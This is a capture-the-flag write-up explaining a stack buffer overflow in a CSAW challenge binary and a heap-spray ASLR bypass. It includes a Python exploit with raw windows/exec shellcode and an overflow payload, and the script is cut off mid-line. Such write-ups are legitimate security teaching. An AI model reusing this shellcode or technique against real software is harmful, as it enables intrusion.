|=-----------------------------------------------------------------------=| |=--------------=[ Julian Cohen's Exploitation Challenge ]=--------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ by smd@RPISEC ]=---------------------------=| |=-----------------------------------------------------------------------=| -- [ Intro For this challenge, we were given a 32bit PE file. The goal was to write an exploit, send it to julian, and one shot popping calc.exe on a win7 x64 box. We spent most of our time on another challenge, so we didn't really look into this during the competition. Which was unfortunate, since it really wasn't that hard. At first look, we can see that this is simulating an implementation of the CSAW Mark Up Language browser. It parses and builds CSAW Unit Model or CUM. A quote from the binary, "After parsing, CUM is drawn all over the screen", hehe. So, our first step is to try and create a valid .cml file. We do this by seeing how it parses them. A quick glance, and you can see a switch table. The switch table contains all the tags you could use. The following tags exist: : link : bold : italics : blink : test object : underline So a valid cml file would look like this: Bhello worldB This will print a BOLD OBJECT to the screen. The app will first iterate through and create the tag objects. Upon creating all the objects, it will then draw CUM all to the screen! -- [ The Vulnerability The vulnerability occurs in the "A" tag. When CUMing, it will first copy the data created on the heap to a 128 byte buffer on the stack. Guess what...no bounds check! So we have a straight forward buffer overflow. However, since on Win7, we have ASLR + DEP! For this challenge though, Julian was kind of enough to give us an executalbe heap :) So with a simple heapspray, we can easily defeat ASLR. -- [ The Exploit #!/usr/bin/env python from struct import pack # windows/exec calc.exe # 227 bytes scode = "\xba\x1c\xb7\x2f\xeb\xd9\xc0\xd9\x74\x24\xf4\x5e\x31\xc9" + \ "\xb1\x33\x83\xc6\x04\x31\x56\x0e\x03\x4a\xb9\xcd\x1e\x8e" + \ "\x2d\x98\xe1\x6e\xae\xfb\x68\x8b\x9f\x29\x0e\xd8\xb2\xfd" + \ "\x44\x8c\x3e\x75\x08\x24\xb4\xfb\x85\x4b\x7d\xb1\xf3\x62" + \ "\x7e\x77\x3c\x28\xbc\x19\xc0\x32\x91\xf9\xf9\xfd\xe4\xf8" + \ "\x3e\xe3\x07\xa8\x97\x68\xb5\x5d\x93\x2c\x06\x5f\x73\x3b" + \ "\x36\x27\xf6\xfb\xc3\x9d\xf9\x2b\x7b\xa9\xb2\xd3\xf7\xf5" + \ "\x62\xe2\xd4\xe5\x5f\xad\x51\xdd\x14\x2c\xb0\x2f\xd4\x1f" + \ "\xfc\xfc\xeb\x90\xf1\xfd\x2c\x16\xea\x8b\x46\x65\x97\x8b" + \ "\x9c\x14\x43\x19\x01\xbe\x00\xb9\xe1\x3f\xc4\x5c\x61\x33" + \ "\xa1\x2b\x2d\x57\x34\xff\x45\x63\xbd\xfe\x89\xe2\x85\x24" + \ "\x0e\xaf\x5e\x44\x17\x15\x30\x79\x47\xf1\xed\xdf\x03\x13" + \ "\xf9\x66\x4e\x79\xfc\xeb\xf4\xc4\xfe\xf3\xf6\x66\x97\xc2" + \ "\x7d\xe9\xe0\xda\x57\x4e\x1e\x91\xfa\xe6\xb7\x7c\x6f\xbb" + \ "\xd5\x7e\x45\xff\xe3\xfc\x6c\x7f\x10\x1c\x05\x7a\x5c\x9a" + \ "\xf5\xf6\xcd\x4f\xfa\xa5\xee\x45\x99\x28\x7d\x05\x70\xcf" + \ "\x05\xac\x8c" def pwn(): f = open('fuck.cml', 'w') block = "T" block += "\x90"*(0xFFFF-len(scode)) block += scode block += "T" # overflow of = "A" + "D"*132 + pack("